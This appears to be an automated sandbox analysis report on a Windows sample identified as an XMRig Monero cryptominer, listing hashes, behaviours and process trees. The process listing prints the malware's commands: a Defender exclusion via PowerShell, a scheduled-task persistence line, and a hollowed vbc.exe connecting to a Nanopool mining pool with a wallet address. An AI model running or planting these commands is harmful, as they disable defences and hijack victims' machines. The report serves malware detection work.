Analysis
-
max time kernel
204s -
max time network
209s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
30-11-2022 03:09
Static task
static1
Behavioral task
behavioral1
Sample
7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe
Resource
win7-20220901-en
General
-
Target
7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe
-
Size
648KB
-
MD5
4f17d8dcc61d0dea7dd6c4cd0162b246
-
SHA1
d3a2505f416a32ed98e71117db7188cf1a464c5d
-
SHA256
7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0
-
SHA512
c4364d742f83dde0aec4a6120f5521bfff3df7e522eb43a3c9bcca6f3fbf3fdd000edb6aeceb2e4c84bebea46a6a3b110f538a982ce41919fb9f8da88ece98b2
-
SSDEEP
12288:cm+6CtnUrur4tohP1aYZKHbncTnCQB6X/MJiY:x+rpX0tohhZKb+YM
Malware Config
Signatures
-
XMRig Miner payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/4352-186-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4352-187-0x0000000140343234-mapping.dmp xmrig behavioral2/memory/4352-188-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4352-189-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4352-191-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4352-195-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
YHKO.exepid process 5112 YHKO.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
YHKO.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation YHKO.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
YHKO.exedescription pid process target process PID 5112 set thread context of 4352 5112 YHKO.exe vbc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2780 timeout.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exepowershell.exeYHKO.exepowershell.exepid process 4156 7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe 4156 7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe 1956 powershell.exe 1956 powershell.exe 5112 YHKO.exe 5112 YHKO.exe 4228 powershell.exe 4228 powershell.exe 5112 YHKO.exe 5112 YHKO.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 652 -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exepowershell.exeYHKO.exepowershell.exevbc.exedescription pid process Token: SeDebugPrivilege 4156 7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe Token: SeDebugPrivilege 1956 powershell.exe Token: SeDebugPrivilege 5112 YHKO.exe Token: SeDebugPrivilege 4228 powershell.exe Token: SeLockMemoryPrivilege 4352 vbc.exe Token: SeLockMemoryPrivilege 4352 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
vbc.exepid process 4352 vbc.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.execmd.exeYHKO.execmd.exedescription pid process target process PID 4156 wrote to memory of 1956 4156 7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe powershell.exe PID 4156 wrote to memory of 1956 4156 7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe powershell.exe PID 4156 wrote to memory of 876 4156 7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe cmd.exe PID 4156 wrote to memory of 876 4156 7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe cmd.exe PID 876 wrote to memory of 2780 876 cmd.exe timeout.exe PID 876 wrote to memory of 2780 876 cmd.exe timeout.exe PID 876 wrote to memory of 5112 876 cmd.exe YHKO.exe PID 876 wrote to memory of 5112 876 cmd.exe YHKO.exe PID 5112 wrote to memory of 4228 5112 YHKO.exe powershell.exe PID 5112 wrote to memory of 4228 5112 YHKO.exe powershell.exe PID 5112 wrote to memory of 4152 5112 YHKO.exe cmd.exe PID 5112 wrote to memory of 4152 5112 YHKO.exe cmd.exe PID 4152 wrote to memory of 1952 4152 cmd.exe schtasks.exe PID 4152 wrote to memory of 1952 4152 cmd.exe schtasks.exe PID 5112 wrote to memory of 4352 5112 YHKO.exe vbc.exe PID 5112 wrote to memory of 4352 5112 YHKO.exe vbc.exe PID 5112 wrote to memory of 4352 5112 YHKO.exe vbc.exe PID 5112 wrote to memory of 4352 5112 YHKO.exe vbc.exe PID 5112 wrote to memory of 4352 5112 YHKO.exe vbc.exe PID 5112 wrote to memory of 4352 5112 YHKO.exe vbc.exe PID 5112 wrote to memory of 4352 5112 YHKO.exe vbc.exe PID 5112 wrote to memory of 4352 5112 YHKO.exe vbc.exe PID 5112 wrote to memory of 4352 5112 YHKO.exe vbc.exe PID 5112 wrote to memory of 4352 5112 YHKO.exe vbc.exe PID 5112 wrote to memory of 4352 5112 YHKO.exe vbc.exe PID 5112 wrote to memory of 4352 5112 YHKO.exe vbc.exe PID 5112 wrote to memory of 4352 5112 YHKO.exe vbc.exe PID 5112 wrote to memory of 4352 5112 YHKO.exe vbc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe"C:\Users\Admin\AppData\Local\Temp\7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6C37.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
-
C:\ProgramData\dlllib\YHKO.exe"C:\ProgramData\dlllib\YHKO.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "YHKO" /tr "C:\ProgramData\dlllib\YHKO.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "YHKO" /tr "C:\ProgramData\dlllib\YHKO.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\dlllib\YHKO.exeFilesize
648KB
MD54f17d8dcc61d0dea7dd6c4cd0162b246
SHA1d3a2505f416a32ed98e71117db7188cf1a464c5d
SHA2567a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0
SHA512c4364d742f83dde0aec4a6120f5521bfff3df7e522eb43a3c9bcca6f3fbf3fdd000edb6aeceb2e4c84bebea46a6a3b110f538a982ce41919fb9f8da88ece98b2
-
C:\ProgramData\dlllib\YHKO.exeFilesize
648KB
MD54f17d8dcc61d0dea7dd6c4cd0162b246
SHA1d3a2505f416a32ed98e71117db7188cf1a464c5d
SHA2567a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0
SHA512c4364d742f83dde0aec4a6120f5521bfff3df7e522eb43a3c9bcca6f3fbf3fdd000edb6aeceb2e4c84bebea46a6a3b110f538a982ce41919fb9f8da88ece98b2
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Temp\tmp6C37.tmp.batFilesize
139B
MD5fb699a1e4c9c67bf7403a42a13d878f7
SHA121528e0c2ec3273b9256d79751d28cfebf963171
SHA2565119e44cb283069d19b31c79a1357a7dac1677fd0fbebc8b14831f6abeed17b9
SHA512f59ec793fdaf2292a203f6a26172723fad7ea8e39e653923a8f480aaf46abc70f2131fad6b2bf3b0d87bf476c2b27e031c5e5cb8a45e673cdd73db9480b42ccb
-
memory/876-146-0x0000000000000000-mapping.dmp
-
memory/1952-177-0x0000000000000000-mapping.dmp
-
memory/1956-147-0x000002A07E4E0000-0x000002A07E502000-memory.dmpFilesize
136KB
-
memory/1956-179-0x00007FFB24E00000-0x00007FFB258C1000-memory.dmpFilesize
10MB
-
memory/1956-153-0x00007FFB24E00000-0x00007FFB258C1000-memory.dmpFilesize
10MB
-
memory/1956-145-0x0000000000000000-mapping.dmp
-
memory/1956-154-0x00007FFB24E00000-0x00007FFB258C1000-memory.dmpFilesize
10MB
-
memory/2780-152-0x0000000000000000-mapping.dmp
-
memory/4152-173-0x0000000000000000-mapping.dmp
-
memory/4156-136-0x00007FFB42350000-0x00007FFB423EE000-memory.dmpFilesize
632KB
-
memory/4156-139-0x00007FFB423F0000-0x00007FFB42591000-memory.dmpFilesize
1MB
-
memory/4156-143-0x00007FFB235A0000-0x00007FFB236EE000-memory.dmpFilesize
1MB
-
memory/4156-144-0x00007FFB24E00000-0x00007FFB258C1000-memory.dmpFilesize
10MB
-
memory/4156-148-0x0000000000BD0000-0x0000000000CD8000-memory.dmpFilesize
1MB
-
memory/4156-141-0x00007FFB43B60000-0x00007FFB43B8B000-memory.dmpFilesize
172KB
-
memory/4156-140-0x00007FFB24E00000-0x00007FFB258C1000-memory.dmpFilesize
10MB
-
memory/4156-149-0x0000000003140000-0x0000000003183000-memory.dmpFilesize
268KB
-
memory/4156-150-0x00007FFB24E00000-0x00007FFB258C1000-memory.dmpFilesize
10MB
-
memory/4156-142-0x0000000000BD0000-0x0000000000CD8000-memory.dmpFilesize
1MB
-
memory/4156-138-0x00007FFB25EA0000-0x00007FFB25F5D000-memory.dmpFilesize
756KB
-
memory/4156-137-0x00007FFB3F6F0000-0x00007FFB3F702000-memory.dmpFilesize
72KB
-
memory/4156-133-0x00007FFB25F60000-0x00007FFB2600A000-memory.dmpFilesize
680KB
-
memory/4156-134-0x0000000000BD0000-0x0000000000CD8000-memory.dmpFilesize
1MB
-
memory/4156-135-0x0000000003140000-0x0000000003183000-memory.dmpFilesize
268KB
-
memory/4228-180-0x00007FFB24E00000-0x00007FFB258C1000-memory.dmpFilesize
10MB
-
memory/4228-176-0x00007FFB24E00000-0x00007FFB258C1000-memory.dmpFilesize
10MB
-
memory/4228-172-0x00007FFB24E00000-0x00007FFB258C1000-memory.dmpFilesize
10MB
-
memory/4228-171-0x0000000000000000-mapping.dmp
-
memory/4352-199-0x0000025205B70000-0x0000025205B90000-memory.dmpFilesize
128KB
-
memory/4352-189-0x0000000140000000-0x00000001407C9000-memory.dmpFilesize
7MB
-
memory/4352-188-0x0000000140000000-0x00000001407C9000-memory.dmpFilesize
7MB
-
memory/4352-187-0x0000000140343234-mapping.dmp
-
memory/4352-186-0x0000000140000000-0x00000001407C9000-memory.dmpFilesize
7MB
-
memory/4352-190-0x0000025173340000-0x0000025173360000-memory.dmpFilesize
128KB
-
memory/4352-191-0x0000000140000000-0x00000001407C9000-memory.dmpFilesize
7MB
-
memory/4352-194-0x0000025173390000-0x00000251733D0000-memory.dmpFilesize
256KB
-
memory/4352-195-0x0000000140000000-0x00000001407C9000-memory.dmpFilesize
7MB
-
memory/4352-196-0x0000025205940000-0x0000025205960000-memory.dmpFilesize
128KB
-
memory/4352-197-0x0000025205B70000-0x0000025205B90000-memory.dmpFilesize
128KB
-
memory/4352-198-0x0000025205940000-0x0000025205960000-memory.dmpFilesize
128KB
-
memory/5112-166-0x00000000004F0000-0x00000000005F8000-memory.dmpFilesize
1MB
-
memory/5112-175-0x00007FFB24E00000-0x00007FFB258C1000-memory.dmpFilesize
10MB
-
memory/5112-174-0x00000000004F0000-0x00000000005F8000-memory.dmpFilesize
1MB
-
memory/5112-181-0x00007FFB41F10000-0x00007FFB41F37000-memory.dmpFilesize
156KB
-
memory/5112-182-0x00007FFB20F30000-0x00007FFB20F65000-memory.dmpFilesize
212KB
-
memory/5112-183-0x00007FFB20F70000-0x00007FFB21072000-memory.dmpFilesize
1MB
-
memory/5112-184-0x00007FFB432E0000-0x00007FFB4334B000-memory.dmpFilesize
428KB
-
memory/5112-185-0x00007FFB40BA0000-0x00007FFB40BDB000-memory.dmpFilesize
236KB
-
memory/5112-170-0x00007FFB24E00000-0x00007FFB258C1000-memory.dmpFilesize
10MB
-
memory/5112-169-0x0000000000440000-0x0000000000483000-memory.dmpFilesize
268KB
-
memory/5112-168-0x00000000004F0000-0x00000000005F8000-memory.dmpFilesize
1MB
-
memory/5112-167-0x00007FFB235A0000-0x00007FFB236EE000-memory.dmpFilesize
1MB
-
memory/5112-165-0x00007FFB43B60000-0x00007FFB43B8B000-memory.dmpFilesize
172KB
-
memory/5112-164-0x00007FFB24E00000-0x00007FFB258C1000-memory.dmpFilesize
10MB
-
memory/5112-192-0x00000000004F0000-0x00000000005F8000-memory.dmpFilesize
1MB
-
memory/5112-193-0x00007FFB24E00000-0x00007FFB258C1000-memory.dmpFilesize
10MB
-
memory/5112-163-0x00007FFB423F0000-0x00007FFB42591000-memory.dmpFilesize
1MB
-
memory/5112-162-0x00007FFB25EA0000-0x00007FFB25F5D000-memory.dmpFilesize
756KB
-
memory/5112-161-0x00007FFB3F6F0000-0x00007FFB3F702000-memory.dmpFilesize
72KB
-
memory/5112-160-0x00007FFB42350000-0x00007FFB423EE000-memory.dmpFilesize
632KB
-
memory/5112-159-0x00007FFB25F60000-0x00007FFB2600A000-memory.dmpFilesize
680KB
-
memory/5112-155-0x0000000000000000-mapping.dmp